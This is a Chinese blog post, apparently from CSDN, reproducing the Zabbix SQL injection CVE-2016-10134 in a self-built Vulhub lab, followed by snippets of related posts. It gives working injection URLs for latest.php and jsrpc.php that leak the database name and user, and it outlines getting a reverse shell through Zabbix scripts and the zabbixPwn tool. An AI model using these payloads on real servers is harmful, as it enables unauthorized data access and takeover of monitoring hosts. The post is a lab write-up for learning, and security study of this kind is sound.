zabbix jsrpc.php,Vulnhub-zabbix latest.php SQL注入漏洞(CVE-2016-10134)

最新推荐文章于 2023-12-27 16:03:32 发布
最新推荐文章于 2023-12-27 16:03:32 发布
阅读量295 收藏
点赞数
文章标签: zabbix jsrpc.php

郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。

漏洞简述

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

(引用)2016年8月12日,1n3通过邮件披露了Zabbix软件的jsrpc.php文件在处理profileIdx2参数时存在insert方式的SQL注入漏洞,与官方通告的latest.php文件在处理toggle_ids参数时存在insert方式的SQL注入漏洞属于同一类型的漏洞,只是攻击的位置不同。

影响版本:2.0.5 2.0.13 2.2.x 2.4.2 2.4.5 2.4.7 2.4.8 2.5.0 3.0.0-3.0.3

准备环境

测试机IP:192.168.79.129

靶机IP:192.168.79.131

1. 启动Vulnhub靶机环境:

3cff7625537e

2. 验证靶机应用启用成功:

3cff7625537e

漏洞复现

注入点一:latest.php页面

前提条件:至少需要一个guest账户权限

1. 使用guest账户登录

3cff7625537e

2. 查看cookie,获取zbx_sessionid

3cff7625537e

3. 注入payload(sid取zbx_sessionid后16位):

http://192.168.79.131:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,database()),0)

3cff7625537e

http://192.168.79.131:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

3cff7625537e

注入点二:jsrpc.php页面,无须登录

http://192.168.79.131:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

3cff7625537e

http://192.168.79.131:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

3cff7625537e

扩展: Get Shell

前提条件:拥有Zabbix管理员权限

方法一:Script

1. 创建一个反弹script

3cff7625537e

2. 使用NC侦听反弹端口

3cff7625537e

3. 触发反弹

3cff7625537e

4. 得到反弹Shell

3cff7625537e

方法二:工具 zabbixPwn.py

引用:https://github.com/RicterZ/zabbixPwn

1. 运行

3cff7625537e

2. 登录Zabbix寻找到hostid:10084

3cff7625537e

3. 填写hostid,继续运行,成功执行命令

3cff7625537e

4. 使用NC侦听反弹端口

3cff7625537e

5. 执行反弹命令

3cff7625537e

6. 得到反弹Shell

3cff7625537e

针对Zabbix的攻击思路(引用来自作者:0xdf)

3cff7625537e

袁小嵇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134
qq_51577576的博客
08-14 3300
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
zabbix SQL注入漏洞CVE-2016-10134
SoulCat
01-26 7097
zabbix SQL注入漏洞CVE-2016-10134漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbixlatest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
zabbix jsrpc.php,Zabbix SQL(jsrpc.php) 注入漏洞分析 (以3.0.2为例)
weixin_28993705的博客
03-10 666
近日,Zabbix的web后台爆出一个sql注入漏洞。青藤云安全团队立即响应,并提出了临时&最佳解决方案。0x00 漏洞概述漏洞类型:SQL 注入危险等级:高利用条件:该漏洞需要登录,但是系统内置Guest帐号且默认为启用状态。受影响参数:profileIdx20x01POC测试http://xxx.testzabbix.com/zabbix/jsrpc.php?sid=0bcd4ad...
zabbix jsrpc.php,Zabbix API的介绍及使用
weixin_29988907的博客
03-10 612
Zabbix API的介绍及使用发布时间:2018-06-29 11:41,浏览次数:665, 标签:ZabbixAPIzabbix拥有完善的API,基于JSONRPC提供资产,主机,主机组,监控项,告警等方面的接口。在做运维自动化时,需要用API功能对zabbix二次开发。本文我将介绍如何用python信使用zabbix的API。API介绍*API地址, http://你的zabbix域名/ap...
Zabbix sql注入漏洞(CVE-2016-10134)
最新发布
m0_65150886的博客
12-27 804
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbixlatest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix-agent-3.4.10-1.el7.x86-64.rpm
12-19
zabbix-agent-3.4.10-1.el7.x86_64.rpm是一个在CentOS 7系统上运行的Zabbix代理的安装包。 Zabbix是一个开源的IT监控解决方案,它由一个代理(agent)和一个服务器组成。代理部署在需要监控的主机上,收集数据并将...
zabbix-agent-4.0.30-1.el7.x86_64.zip
01-13
zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip
zabbix-release-6.0-1.el7.noarch.rpm
04-08
zabbix-release-6.0-1.el7.noarch.rpm
漏洞复现----26、Zabbix latest.php SQL注入漏洞CVE-2016-10134
七天
06-28 703
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 926
zabbix-latest.php-SQL注入漏洞
zabbix latest.php SQL注入漏洞CVE-2016-10134
菜鸟耿耿
10-07 1453
zabbix latest.php SQL注入漏洞CVE-2016-10134zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
zabbix前台jsrpc注入
weixin_30755709的博客
09-01 163
zabbix是一个开源的企业级性能监控解决方案。 官方网站:http://www.zabbix.com zabbixjsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 首先打开登录页面 检测是否可以guest登录。 然后xx.com/jsrpc...
Zabbixcve-2016-10134漏洞复现
hh27644607523的博客
06-26 109
登录之后查看cookie中的zbx_sessionid并复制后16位。拉取镜像docker-compose up -d。也可以通过jsrpc.php触发,且无需登录。使用guest账号登录无需密码。将后16位作为值拼接访问。访问ip 8080端口。
vulhub学习文档-zabbix php SQL注入漏洞
ploto_cs的博客
09-12 743
zabbix php SQL注入漏洞 一.漏洞介绍 (一)编号 CVE-2016-10134 (二)概述 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 (三)影响版本 Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本。 (四)漏洞要求 zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。 二.操作步骤 (一)Vulhub ip地址:http://192.168.126.13
zabbix安全漏洞和防范方法
wj193165zl的博客
08-15 3143
zabbix的安全一般分为以下的几种: 1,zabbix配置不当导致的安全事件 zabbix服务端的权限非常高,很多黑客可以通过zabbix的服务端对被监控服务器进行渗透攻击,所以,zabbix在安装后,必须修改zabbix的默认用户名和密码,就算将zabbix放到内网中,也不能保证zabbix的绝对安全。 2,zabbix弱口令密码,容易被爆破 3,zabbix低版本的注入漏洞,通过该注...
我要用docker安装zabbix-proxy5.0.31 docker-compose来安装
05-31
好的,首先你需要确保已经安装了 Docker 和 Docker Compose。 接下来,你可以按照以下步骤来安装 zabbix-proxy5.0.31: 1. 创建一个名为 `docker-compose.yml` 的文件,内容如下: ``` version: '3' services: zabbix-proxy: image: zabbix/zabbix-proxy5.0:latest container_name: zabbix-proxy environment: ZBX_HOSTNAME: zabbix-proxy ZBX_SERVER_HOST: zabbix-server ZBX_SERVER_PORT: "10051" ZBX_PROXYMODE: "0" ZBX_LOGTYPE: console ports: - "10051:10051" restart: always ``` 其中: - `image` 指定使用的镜像。 - `container_name` 指定容器的名称。 - `environment` 指定环境变量,包括 zabbix-proxy 的主机名、zabbix-server 的主机名或 IP 地址、监听端口、代理模式和日志输出方式。 - `ports` 将容器的 10051 端口映射到宿主机的 10051 端口。 - `restart` 指定容器停止后自动重启。 2. 在命令行中进入 `docker-compose.yml` 所在目录,运行以下命令启动容器: ``` docker-compose up -d ``` 这个命令将会启动一个名为 `zabbix-proxy` 的容器,并且将会输出容器的 ID。 3. 运行以下命令查看容器是否正常运行: ``` docker ps ``` 如果看到类似如下的输出,说明容器已经成功运行: ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 3f0e931f2d35 zabbix/zabbix-proxy5.0:latest "/sbin/tini -- /usr/…" 10 seconds ago Up 8 seconds 0.0.0.0:10051->10051/tcp, 162/udp zabbix-proxy ``` 现在 zabbix-proxy5.0.31 已经成功运行在 Docker 容器中了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值